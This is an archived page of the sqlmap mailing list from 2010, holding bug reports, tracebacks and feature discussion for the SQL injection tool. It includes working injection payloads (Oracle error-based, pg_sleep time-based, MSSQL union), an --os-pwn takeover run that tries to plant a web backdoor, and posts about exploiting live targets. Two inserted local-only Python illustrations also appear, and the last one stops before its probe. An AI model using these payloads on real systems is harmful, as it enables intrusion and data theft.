sqlmap-users Mailing List for sqlmap (Page 128)
From: Ethan R. <eth...@gm...> - 2010-04-20 07:20:21
[root]# ./sqlmap.py -u http://192.168.1.7/insecure.php --method=POST --data="name=bobby&submit=Search" -p name --os-pwn

sqlmap/0.8 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 02:10:57

[02:10:57] [WARNING] you did not provide the local path where Metasploit Framework 3 is installed
[02:10:57] [WARNING] sqlmap is going to look for Metasploit Framework 3 installation into the environment paths
[02:10:57] [INFO] Metasploit Framework 3 has been found installed in the '/usr/local/bin' path
[02:10:57] [INFO] using '/home/ethan/installs/sqlmap/output/192.168.1.7/session' as session file
[02:10:57] [INFO] testing connection to the target url
[02:10:58] [INFO] testing if the url is stable, wait a few seconds
[02:10:59] [INFO] url is stable
[02:10:59] [INFO] testing sql injection on POST parameter 'name' with 0 parenthesis
[02:11:00] [INFO] testing unescaped numeric injection on POST parameter 'name'
[02:11:00] [INFO] POST parameter 'name' is not unescaped numeric injectable
[02:11:00] [INFO] testing single quoted string injection on POST parameter 'name'
[02:11:00] [INFO] confirming single quoted string injection on POST parameter 'name'
[02:11:00] [INFO] POST parameter 'name' is single quoted string injectable with 0 parenthesis
[02:11:00] [INFO] testing for parenthesis on injectable parameter
[02:11:01] [INFO] the injectable parameter requires 0 parenthesis
[02:11:01] [INFO] testing MySQL
[02:11:01] [INFO] confirming MySQL
[02:11:02] [INFO] retrieved: 4
[02:11:03] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL >= 5.0.0
[02:11:03] [INFO] testing stacked queries support on parameter 'name'
[02:11:03] [INFO] detecting back-end DBMS version from its banner
[02:11:03] [INFO] retrieved: 5.1.41
[02:11:15] [WARNING] the web application does not support stacked queries on parameter 'name'
[02:11:15] [INFO] going to use a web backdoor to execute the payload stager
[02:11:15] [INFO] fingerprinting the back-end DBMS operating system
[02:11:15] [INFO] retrieved: \
[02:11:18] [INFO] the back-end DBMS operating system is Windows
[02:11:18] [INFO] trying to upload the uploader agent
which web application language does the web server support?
[1] ASP (default)
[2] PHP
[3] JSP
> 2
[02:11:21] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/]:
[02:11:22] [INFO] retrieved web server full paths: 'C:\xampp\htdocs\insecure.php'
please provide any additional web server full path to try to upload the agent [C:/xampp/htdocs/]:
[02:11:23] [ERROR] unhandled exception in sqlmap/0.8, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
sqlmap version: 0.8
Python version: 2.5.2
Operating system: linux2
Traceback (most recent call last):
  File "./sqlmap.py", line 77, in main
    start()
  File "/home/ethan/installs/sqlmap/lib/controller/controller.py", line 259, in start
    action()
  File "/home/ethan/installs/sqlmap/lib/controller/action.py", line 144, in action
    conf.dbmsHandler.osPwn()
  File "/home/ethan/installs/sqlmap/plugins/generic/takeover.py", line 169, in osPwn
    self.initEnv(web=web)
  File "/home/ethan/installs/sqlmap/lib/takeover/abstraction.py", line 155, in initEnv
    self.webInit()
  File "/home/ethan/installs/sqlmap/lib/takeover/web.py", line 189, in webInit
    uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False)
  File "/home/ethan/installs/sqlmap/lib/request/connect.py", line 126, in getPage
    conn = urllib2.urlopen(req)
  File "/usr/lib/python2.5/urllib2.py", line 124, in urlopen
    return _opener.open(url, data)
  File "/usr/lib/python2.5/urllib2.py", line 381, in open
    response = self._open(req, data)
  File "/usr/lib/python2.5/urllib2.py", line 399, in _open
    '_open', req)
  File "/usr/lib/python2.5/urllib2.py", line 360, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.5/urllib2.py", line 1107, in http_open
    return self.do_open(httplib.HTTPConnection, req)
  File "/usr/lib/python2.5/urllib2.py", line 1064, in do_open
    h = http_class(host) # will parse host:port
  File "/usr/lib/python2.5/httplib.py", line 639, in __init__
    self._set_hostport(host, port)
  File "/usr/lib/python2.5/httplib.py", line 651, in _set_hostport
    raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
InvalidURL: nonnumeric port: ''

[*] shutting down at: 02:11:23
From: Bernardo D. A. G. <ber...@gm...> - 2010-04-19 11:52:04
Hi Vitaly,

sqlmap does not support error-based SQL injection yet: this will come in the upcoming months with the new design and rewrite from scratch of the detection engine.

Support to exploit injection points in Oracle Application Server is another task, not planned at the moment though. If you are happy to help, feel free to provide us with patch files to support OAP.

Cheers,
Bernardo

On Sun, Apr 18, 2010 at 17:45, <d...@ds...> wrote:
>
> First, sorry for my bad English, I'm from Romania.
>
> I use sqlmap to test web app + Oracle DB.
> Maybe it will be done to use for Oracle blind injection technique like this:
>
> http://example.com/app.jsp?id=21 and(1)=(select upper(XMLType(chr(60)||chr(58)||chr(58)||(select replace(banner,chr(32),chr(58)) from sys.v_$version where rownum=1)||chr(62))) from dual)--
>
> It works only if print error is on, but the technique will be useful, I think.
> If need I cant post a real link with example.
> I write a small tool in Python to use this technique, but using a lot of utilities is not comfortable; I really want to see this technique in sqlmap :)
> If you need some form of assistance with this task I would be happy to assist you.
>
> Two, implement support of Oracle Application Server in sqlmap :)
> sqlmap doesn't know how to work with it, but there exists more than one technique to exploit SQL injection for Oracle Application Server.
>
> If you're busy with other matters I would take to embed this technique in sqlmap with your help :)
>
> Vitaly Turenko aka DSU (d[at]dsu.com.ua)
> My Oracle security blog http://dsu.com.ua/
>
> ------------------------------------------------------------------------------
> Download Intel® Parallel Studio Eval
> Try the new software tools for yourself. Speed compiling, find bugs
> proactively, and fine-tune applications for parallel performance.
> See why Intel Parallel Studio got high marks during beta.
> http://p.sf.net/sfu/intel-sw-dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: <d...@ds...> - 2010-04-18 17:12:43
First, sorry for my bad English, I'm from Romania.

I use sqlmap to test web app + Oracle DB.
Maybe it will be done to use for Oracle blind injection technique like this:

http://example.com/app.jsp?id=21 and(1)=(select upper(XMLType(chr(60)||chr(58)||chr(58)||(select replace(banner,chr(32),chr(58)) from sys.v_$version where rownum=1)||chr(62))) from dual)--

It works only if print error is on, but the technique will be useful, I think.
If need I cant post a real link with example.
I write a small tool in Python to use this technique, but using a lot of utilities is not comfortable; I really want to see this technique in sqlmap :)
If you need some form of assistance with this task I would be happy to assist you.

Two, implement support of Oracle Application Server in sqlmap :)
sqlmap doesn't know how to work with it, but there exists more than one technique to exploit SQL injection for Oracle Application Server.

If you're busy with other matters I would take to embed this technique in sqlmap with your help :)

Vitaly Turenko aka DSU (d[at]dsu.com.ua)
My Oracle security blog http://dsu.com.ua/
From: Miroslav S. <mir...@gm...> - 2010-04-15 09:36:53
Hi.

Implemented by your request :). Try the latest SVN version.

Kind regards.

On Thu, Apr 15, 2010 at 12:07 AM, Ole Rasmussen <ol...@gm...> wrote:
> Many DBs are often designed such that table/db names are coherent.
> Something often seen is that every table name is prefixed with some
> string describing somewhat the relations in the table. An example:
>
> DB table1:
> data_catalogs
> data_catalogs_log
> data_catalyst
> data_emails
> data_emails_old
>
> I don't know if SqlMap takes proximity of the last found table names
> into account when enumerating - if it doesn't that could greatly speed
> up enumerating table names like in the above example.
> When SqlMap acquires the name 'data_catalogs' it could start the next
> query by checking if the first letter is 'd' (which it is in the above
> example), circumventing the need to do the binary relation search. If
> the letter isn't 'd' then all we lost is adding a single query, but we
> save a lot of queries if it is. Next time (if the letter was 'd') it
> would check if the letter was 'a', then 't' and so on.
> This would of course only work if the data is fetched in sorted order,
> but I haven't encountered a case where it isn't yet - I guess it must
> be sorted in INFORMATION tables in MySql? If it is then I think this
> only underlines why you should implement the suggested proximity
> queries. It might also be advantageous to exploit that the information
> is sorted even without proximity queries; if we just received a table
> name starting with 'd' then we know the next table name starts with at
> least 'd' as well - I'm not sure if SqlMap already exploits this?
>
> Regards,
> Ole
>

-- 
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
From: Ole R. <ol...@gm...> - 2010-04-14 22:07:51
Many DBs are often designed such that table/db names are coherent. Something often seen is that every table name is prefixed with some string describing somewhat the relations in the table. An example:

DB table1:
data_catalogs
data_catalogs_log
data_catalyst
data_emails
data_emails_old

I don't know if SqlMap takes proximity of the last found table names into account when enumerating - if it doesn't, that could greatly speed up enumerating table names like in the above example.
When SqlMap acquires the name 'data_catalogs' it could start the next query by checking if the first letter is 'd' (which it is in the above example), circumventing the need to do the binary relation search. If the letter isn't 'd' then all we lost is adding a single query, but we save a lot of queries if it is. Next time (if the letter was 'd') it would check if the letter was 'a', then 't' and so on.
This would of course only work if the data is fetched in sorted order, but I haven't encountered a case where it isn't yet - I guess it must be sorted in INFORMATION tables in MySql? If it is then I think this only underlines why you should implement the suggested proximity queries. It might also be advantageous to exploit that the information is sorted even without proximity queries; if we just received a table name starting with 'd' then we know the next table name starts with at least 'd' as well - I'm not sure if SqlMap already exploits this?

Regards,
Ole
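Added illustration of the query budget behind the proximity idea in the message above; this is not code from sqlmap or from Ole's post. A constructed, purely local oracle holds a sorted list of names and answers one yes/no question per query, and the script counts how many questions plain per-character binary search needs against first guessing the previous name's character, combined with the sorted-order lower bound Ole also mentions. The character set, its sort order and the oracle itself are assumptions made for the model.

```python
"""Query-cost model: blind, character-by-character recovery of a sorted
name list, plain binary search versus the 'proximity' guess.  The oracle
is constructed and local: it answers yes/no questions about names it
holds in memory and counts them.  No network, no database involved."""

# Assumed character set and sort order; "" is the end-of-name sentinel
# and ranks lowest, as a shorter name sorts before its own extension.
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789_"
SYMBOLS = [""] + list(ALPHABET)
RANK = {s: r for r, s in enumerate(SYMBOLS)}

# Constructed sample input: the table names from Ole's example.
NAMES = ["data_catalogs", "data_catalogs_log", "data_catalyst",
         "data_emails", "data_emails_old"]


class Oracle:
    """Holds the names in sorted order and answers one yes/no question
    per query, the way a boolean-based blind channel leaks one bit per
    request."""

    def __init__(self, names):
        self.names = sorted(names, key=lambda n: [RANK[c] for c in n])
        self.queries = 0

    def _char(self, k, i):
        n = self.names[k]
        return n[i] if i < len(n) else ""

    def greater(self, k, i, rank):
        """Is the rank of character i of name k greater than `rank`?"""
        self.queries += 1
        return RANK[self._char(k, i)] > rank

    def equals(self, k, i, ch):
        """Is character i of name k exactly `ch`?"""
        self.queries += 1
        return self._char(k, i) == ch


def bisect_char(oracle, k, i, lo, hi):
    """Binary search for the rank in [lo, hi] using greater() queries."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.greater(k, i, mid):
            lo = mid + 1
        else:
            hi = mid
    return SYMBOLS[lo]


def retrieve(oracle, proximity):
    """Recover every name.  With proximity=True each character is first
    checked against the previous name's character at that position; on
    a miss, sorted order gives a lower bound for the binary search."""
    found = []
    for k in range(len(oracle.names)):
        prev = found[-1] if (proximity and found) else None
        name, tracking, i = "", prev is not None, 0
        while True:
            lo, hi, ch = 0, len(ALPHABET), None
            if tracking:
                guess = prev[i] if i < len(prev) else ""
                if guess and oracle.equals(k, i, guess):
                    ch = guess
                else:
                    # Same prefix as prev and sorted after it: this
                    # character must rank above prev's (or above the
                    # end sentinel if prev has already ended).
                    tracking = False
                    lo = RANK[guess] + 1
            if ch is None:
                ch = bisect_char(oracle, k, i, lo, hi)
            if ch == "":
                break
            name += ch
            i += 1
        found.append(name)
    return found


def query_cost(names, proximity):
    """Return (recovered names, number of oracle queries asked)."""
    oracle = Oracle(names)
    found = retrieve(oracle, proximity)
    return found, oracle.queries


if __name__ == "__main__":
    for mode in (False, True):
        found, cost = query_cost(NAMES, mode)
        print("proximity" if mode else "plain", cost, found == NAMES)
```

On the sample list the proximity run needs far fewer questions than the plain run, which is the whole point of Ole's proposal: predictable, sorted metadata shrinks the number of requests an enumeration takes.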
From: Bernardo D. A. G. <ber...@gm...> - 2010-04-14 08:15:31
Get the latest version from subversion. We committed recently an early support for Access.

Bernardo

On Wed, Apr 14, 2010 at 01:39, Pagera <pag...@gm...> wrote:
> hello
> is there any access support in sqlmap
>
> cuz it show this message:
> Support for this DBMS will be implemented if you ask, just drop us an email
>
> thankx
>

-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: Pagera <pag...@gm...> - 2010-04-13 23:35:40
hello
is there any access support in sqlmap

cuz it show this message:
Support for this DBMS will be implemented if you ask, just drop us an email

thankx
From: Bernardo D. A. G. <ber...@gm...> - 2010-04-09 15:51:26
Fixed wherever possible and committed. Thanks for reporting.

Bernardo

On Fri, Apr 2, 2010 at 09:36, Daliev Ilya <da...@ya...> wrote:
> Hello SQLMAP users.
>
> Version: sqlmap/0.8-rc7
> When using partial (single row) inband sql injection with mssql sqlmap uses
> construction like this
>
> field1=field1_value union all select top 1 some_field from some_table where
> some_field not in (select top N some_field from some_table)
>
> Microsoft says that unordered result set with top clause are nondeterministic.
> Even more, results obtained with different N are the same. May be it's better
> to use skip/limit clause or something like this
>
> field1=field1_value union all select top 1 some_field from some_table where
> some_field not in (select top N some_field from some_table order by 1) and
> some_field in (select top N+1 some_field from some_table order by 1)
>
>
> Regards, Daliev Ilya
>

-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: Miroslav S. <mir...@gm...> - 2010-04-09 10:40:27
Thank you for another report :) Fixed and committed.

Kind regards.

On Fri, Apr 9, 2010 at 12:24 PM, shi...@gm... <shi...@gm...> wrote:
> [12:22:23] [INFO] testing for parenthesis on injectable parameter
> [12:22:23] [INFO] testing Microsoft SQL Server
> [12:22:28] [INFO] confirming Microsoft SQL Server
> [12:22:40] [INFO] the back-end DBMS is Microsoft SQL Server
>
> [12:22:40] [ERROR] unhandled exception in sqlmap/0.9-dev, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
> sqlmap version: 0.9-dev
> Python version: 2.6.1
> Operating system: darwin
> Traceback (most recent call last):
>   File "./sqlmap.py", line 78, in main
>     start()
>   File "/Users/hagbart/source/sqlmap_svn/lib/controller/controller.py", line 267, in start
>     action()
>   File "/Users/hagbart/source/sqlmap_svn/lib/controller/action.py", line 68, in action
>     print "%s\n" % conf.dbmsHandler.getFingerprint()
>   File "/Users/hagbart/source/sqlmap_svn/plugins/dbms/mssqlserver/fingerprint.py", line 58, in getFingerprint
>     actVer = formatDBMSfp()
>   File "/Users/hagbart/source/sqlmap_svn/lib/core/common.py", line 139, in formatDBMSfp
>     if ( not versions or versions == [None] ) and kb.dbmsVersion[0] != "Unknown":
> TypeError: 'NoneType' object is unsubscriptable
>

-- 
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
From: <shi...@gm...> - 2010-04-09 10:25:06
[12:22:23] [INFO] testing for parenthesis on injectable parameter
[12:22:23] [INFO] testing Microsoft SQL Server
[12:22:28] [INFO] confirming Microsoft SQL Server
[12:22:40] [INFO] the back-end DBMS is Microsoft SQL Server

[12:22:40] [ERROR] unhandled exception in sqlmap/0.9-dev, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
sqlmap version: 0.9-dev
Python version: 2.6.1
Operating system: darwin
Traceback (most recent call last):
  File "./sqlmap.py", line 78, in main
    start()
  File "/Users/hagbart/source/sqlmap_svn/lib/controller/controller.py", line 267, in start
    action()
  File "/Users/hagbart/source/sqlmap_svn/lib/controller/action.py", line 68, in action
    print "%s\n" % conf.dbmsHandler.getFingerprint()
  File "/Users/hagbart/source/sqlmap_svn/plugins/dbms/mssqlserver/fingerprint.py", line 58, in getFingerprint
    actVer = formatDBMSfp()
  File "/Users/hagbart/source/sqlmap_svn/lib/core/common.py", line 139, in formatDBMSfp
    if ( not versions or versions == [None] ) and kb.dbmsVersion[0] != "Unknown":
TypeError: 'NoneType' object is unsubscriptable
From: Miroslav S. <mir...@gm...> - 2010-04-09 10:16:48
Thank you for your report. Now it should be fixed and committed.

Kind regards.

On Fri, Apr 9, 2010 at 11:52 AM, shi...@gm... <shi...@gm...> wrote:
> xxxxxx01:sqlmap_svn xxxxxxxt$ python sqlmap.py --update
>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 11:50:46
>
> [11:50:46] [INFO] updating sqlmap to latest development version from the subversion repository
> [11:50:46] [INFO] update in progress . done
> [11:50:47] [INFO] updated to the latest revision 1550
> [11:50:47] [INFO] updating Microsoft SQL Server XML versions file
>
> [11:50:50] [ERROR] unhandled exception in sqlmap/0.9-dev, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
> sqlmap version: 0.9-dev
> Python version: 2.6.1
> Operating system: darwin
> Traceback (most recent call last):
>   File "sqlmap.py", line 77, in main
>     init(cmdLineOptions)
>   File "/Users/hagbart/source/sqlmap_svn/lib/core/option.py", line 1074, in init
>     update()
>   File "/Users/hagbart/source/sqlmap_svn/lib/core/update.py", line 261, in update
>     __updateMSSQLXML()
>   File "/Users/hagbart/source/sqlmap_svn/lib/core/update.py", line 57, in __updateMSSQLXML
>     mssqlVersionsHtmlString, _ = Request.getPage(url=MSSQL_VERSIONS_URL, direct=True)
>   File "/Users/hagbart/source/sqlmap_svn/lib/request/connect.py", line 161, in getPage
>     for _, cookie in enumerate(conf.cj):
> TypeError: 'NoneType' object is not iterable
>
> [*] shutting down at: 11:50:51
>

-- 
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
From: <shi...@gm...> - 2010-04-09 09:52:51
xxxxxx01:sqlmap_svn xxxxxxxt$ python sqlmap.py --update

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 11:50:46

[11:50:46] [INFO] updating sqlmap to latest development version from the subversion repository
[11:50:46] [INFO] update in progress . done
[11:50:47] [INFO] updated to the latest revision 1550
[11:50:47] [INFO] updating Microsoft SQL Server XML versions file

[11:50:50] [ERROR] unhandled exception in sqlmap/0.9-dev, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
sqlmap version: 0.9-dev
Python version: 2.6.1
Operating system: darwin
Traceback (most recent call last):
  File "sqlmap.py", line 77, in main
    init(cmdLineOptions)
  File "/Users/hagbart/source/sqlmap_svn/lib/core/option.py", line 1074, in init
    update()
  File "/Users/hagbart/source/sqlmap_svn/lib/core/update.py", line 261, in update
    __updateMSSQLXML()
  File "/Users/hagbart/source/sqlmap_svn/lib/core/update.py", line 57, in __updateMSSQLXML
    mssqlVersionsHtmlString, _ = Request.getPage(url=MSSQL_VERSIONS_URL, direct=True)
  File "/Users/hagbart/source/sqlmap_svn/lib/request/connect.py", line 161, in getPage
    for _, cookie in enumerate(conf.cj):
TypeError: 'NoneType' object is not iterable

[*] shutting down at: 11:50:51
From: Bernardo D. A. G. <ber...@gm...> - 2010-04-07 09:16:52
Steve,

We do not plan to release any new version in the short term. I suggest you to use the latest development version from subversion repository.

Bernardo

On Wed, Apr 7, 2010 at 03:18, Steve Pinkham <ste...@gm...> wrote:
> There seem to be a number of bugfixes since the last release version.
> Is there a bugfix release planned for the near future, or should I
> include the SVN version of sqlmap in the next version of our Web
> Security Dojo project?
>
> Steve
> --
> | Steven Pinkham, Security Researcher |
> | http://www.mavensecurity.com |
> | GPG public key ID CD31CAFB |
>

-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: Steve P. <ste...@gm...> - 2010-04-07 02:18:13
There seem to be a number of bugfixes since the last release version. Is there a bugfix release planned for the near future, or should I include the SVN version of sqlmap in the next version of our Web Security Dojo project?

Steve
-- 
| Steven Pinkham, Security Researcher |
| http://www.mavensecurity.com |
| GPG public key ID CD31CAFB |
From: Bernardo D. A. G. <ber...@gm...> - 2010-04-06 11:26:55
James,

If the web server returns a HTTP return code 301 or 302, sqlmap (as of 0.9-dev) asks the user if he wants to follow the redirection or not (assuming the web server sent a Location or URI header in the HTTP response). In your case it does.
"page not found" error message is displayed only when the HTTP return code is 404, so the redirected page might return such code.

Can you please provide us with the -v 5 output and/or a pcap of the traffic? If it's a sensible site, do so privately please.

Regards,
Bernardo

On Mon, Apr 5, 2010 at 22:22, <ja...@ev...> wrote:
>
> Hello,
>
> I'm exploiting a redirection script..
> http://site.com/redirect.asp?sid=7321.
>
> When i feed it a ' at the end of the URL i get..
>
> Microsoft OLE DB Provider for SQL Server error '80040e14'
>
> Unclosed quotation mark after the character string ''.
>
> /redirect.asp, line 23
>
> Looks good, right? No.
>
> [jl@rashid-abdul-abmerhenijan sqlmap-dev]$ ./sqlmap -u "http://site/redirect.asp?sid=7321" -v 5
>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 17:20:07
>
> [17:20:07] [DEBUG] initializing the configuration
> [17:20:07] [DEBUG] initializing the knowledge base
> [17:20:07] [DEBUG] cleaning up configuration parameters
> [17:20:07] [DEBUG] setting the HTTP timeout
> [17:20:07] [DEBUG] setting the HTTP method to GET
> [17:20:07] [DEBUG] creating HTTP requests opener object
> [17:20:07] [DEBUG] parsing XML queries file
> [17:20:07] [INFO] using '/home/jl/sqlmap-dev/output/site/session' as session file
> [17:20:07] [INFO] testing connection to the target url
> [17:20:07] [ERROR] page not found
>
> [*] shutting down at: 17:20:07
>
> Is there some way to get SQLmap to exploit this?
>
> Here is the raw output
>
> Escape character is '^]'.
> GET /redirect.asp?sid=7321 HTTP/1.0
>
> HTTP/1.1 302 Object moved
> Connection: close
> Date: Mon, 05 Apr 2010 21:18:52 GMT
> Server: Microsoft-IIS/6.0
> X-Powered-By: ASP.NET
> Location: censored_url.com/whatever_data
> Content-Length: 175
> Content-Type: text/html
> Set-Cookie: source=; path=/
> Set-Cookie: sid=220216217218; path=/
> Cache-control: private
>
> <head><title>Object moved</title></head>
> <body><h1>Object Moved</h1>This object may be found <a HREF="censored for privacy">here</a>.</body>
> Connection closed by foreign host.
>
> Using latest SQLMap SVN -- Btw, good work on the MS Access support!@!
>
> -James @ Ev6.NET
>

-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: Bernardo D. A. G. <ber...@gm...> - 2010-04-06 11:16:46
Hi,

If you have ever been the first to report a bug or have suggested a feature that has been implemented or scheduled (when we wrote you so) and your name is not in the contributors file[1], you can report it privately to us[2] and we will adapt accordingly.
If, for any reason, you want your name to be removed from the file, you can as well drop us an email.

[1] http://svn.sqlmap.org/sqlmap/trunk/sqlmap/doc/THANKS
[2] http://sqlmap.sourceforge.net/#author

Cheers,

-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: Bernardo D. A. G. <ber...@gm...> - 2010-04-06 08:55:14
Hi David,

On Mon, Apr 5, 2010 at 21:38, David Guimaraes <sk...@gm...> wrote:
> ...
> I've tried several ways to circumvent this form to gain unauthorized access,
> but i not get success in the handling of sql injection. However, nessus
> reported that the field is vulnerable to Time-Based Sql Injection by
> manipulating the parameter j_username with the following query:
>
> j_username = ';%20select%20pg_sleep%20(10)--
>
> Tested the failure, I noticed that you can only make a time-based blind sql
> injection. But even passing the parameter --time-test for the sqlmap, and
> setting the option in sqlmap.conf timetest to true, does not make sqlmap
> test time-based sql inj.

sqlmap at first has to detect a boolean-based blind sql injection to be able to proceed testing for time based blind sql injection (with --time-test, yes). This is a design flaw of the tool and will be fixed in the next months while we will be working on the refactoring of the detection engine. At the moment you can't use sqlmap to exploit this kind of sql injection.

By the way, this is detailed in the user's manual[1].

[1] http://sqlmap.sourceforge.net/doc/README.html#ss5.5

Cheers,

-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: Miroslav S. <mir...@gm...> - 2010-04-05 23:10:16
Hi.

Fixed and committed. Thank you for your report.

Kind regards.

On Mon, Apr 5, 2010 at 9:52 PM, David Guimaraes <sk...@gm...> wrote:
> The problem happens with any dbms i pass. Oracle, MySQL, Postgre, etc..
>
> # ./sqlmap.py -u "http://xxx" --data "xxx" -p xxx -v 2 --time-test --dbms oracle
>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 16:49:25
>
> [16:49:25] [DEBUG] initializing the configuration
> [16:49:25] [DEBUG] initializing the knowledge base
> [16:49:25] [DEBUG] cleaning up configuration parameters
> [16:49:25] [DEBUG] setting the HTTP timeout
> [16:49:25] [DEBUG] setting the HTTP method to GET
> [16:49:25] [DEBUG] creating HTTP requests opener object
> [16:49:25] [DEBUG] forcing back-end DBMS to user defined value
>
> [16:49:25] [ERROR] unhandled exception in sqlmap/0.9-dev, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
> sqlmap version: 0.9-dev
> Python version: 2.5.2
> Operating system: linux2
> Traceback (most recent call last):
>   File "./sqlmap.py", line 77, in main
>     init(cmdLineOptions)
>   File "/home/skys/sqlmap-dev/lib/core/option.py", line 1074, in init
>     __setDBMS()
>   File "/home/skys/sqlmap-dev/lib/core/option.py", line 503, in __setDBMS
>     "|".join([alias for alias in FIREBIRD_ALIASES]))
> TypeError: not all arguments converted during string formatting
>
> [*] shutting down at: 16:49:25
>
> # svn info
> Path: .
> URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
> Repository Root: https://svn.sqlmap.org/sqlmap
> Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
> Revision: 1536
> Node Kind: directory
> Schedule: normal
> Last Changed Author: stamparm
> Last Changed Rev: 1536
> Last Changed Date: 2010-04-04 11:38:48 -0300 (Sun, 04 Apr 2010)
>
>
> --
> David Gomes Guimarães
>

-- 
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
From: <ja...@ev...> - 2010-04-05 21:40:13
|
Hello,

I'm exploiting a redirection script: http://site.com/redirect.asp?sid=7321. When I feed it a ' at the end of the URL I get:

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark after the character string ''.
/redirect.asp, line 23

Looks good, right? No.

[jl@rashid-abdul-abmerhenijan sqlmap-dev]$ ./sqlmap -u "http://site/redirect.asp?sid=7321" -v 5

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 17:20:07

[17:20:07] [DEBUG] initializing the configuration
[17:20:07] [DEBUG] initializing the knowledge base
[17:20:07] [DEBUG] cleaning up configuration parameters
[17:20:07] [DEBUG] setting the HTTP timeout
[17:20:07] [DEBUG] setting the HTTP method to GET
[17:20:07] [DEBUG] creating HTTP requests opener object
[17:20:07] [DEBUG] parsing XML queries file
[17:20:07] [INFO] using '/home/jl/sqlmap-dev/output/site/session' as session file
[17:20:07] [INFO] testing connection to the target url
[17:20:07] [ERROR] page not found

[*] shutting down at: 17:20:07

Is there some way to get sqlmap to exploit this? Here is the raw output:

Escape character is '^]'.
GET /redirect.asp?sid=7321 HTTP/1.0

HTTP/1.1 302 Object moved
Connection: close
Date: Mon, 05 Apr 2010 21:18:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: censored_url.com/whatever_data
Content-Length: 175
Content-Type: text/html
Set-Cookie: source=; path=/
Set-Cookie: sid=220216217218; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="censored for privacy">here</a>.</body>
Connection closed by foreign host.

Using latest sqlmap SVN.

--
Btw, good work on the MS Access support!

-James @ Ev6.NET |
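One common cause of a "page not found" on an endpoint like the one above is that the client follows the 302 to a host that does not answer, while the evidence of the injection is in the redirector's own first response. The following is an added example (not sqlmap's code and not James's) of probing such a script: a local stand-in server, constructed here for the demonstration (the real site, its Location target and anything beyond the error text quoted in the post are assumptions), answers 302 for a clean sid and the quoted OLE DB error when the sid carries a trailing quote; the probe uses http.client, which never follows redirects, and greps the raw body of each response for the error signature.

```python
import http.client
import re
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed stand-in for the redirector in the post (assumption: not the
# real site). A clean sid answers 302 like the captured telnet session; a sid
# with a trailing quote reaches the DB unbalanced and yields the quoted error.
OLEDB_ERROR = ("Microsoft OLE DB Provider for SQL Server error '80040e14'\n"
               "Unclosed quotation mark after the character string ''.\n"
               "/redirect.asp, line 23\n")


class _Redirector(BaseHTTPRequestHandler):
    def do_GET(self):
        sid = parse_qs(urlparse(self.path).query).get("sid", [""])[0]
        if "'" in sid:                      # unbalanced quote -> DB error page
            status, body = 500, OLEDB_ERROR.encode()
        else:
            status, body = 302, b"<head><title>Object moved</title></head>"
        self.send_response(status)
        if status == 302:
            self.send_header("Location", "http://example.invalid/whatever_data")
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

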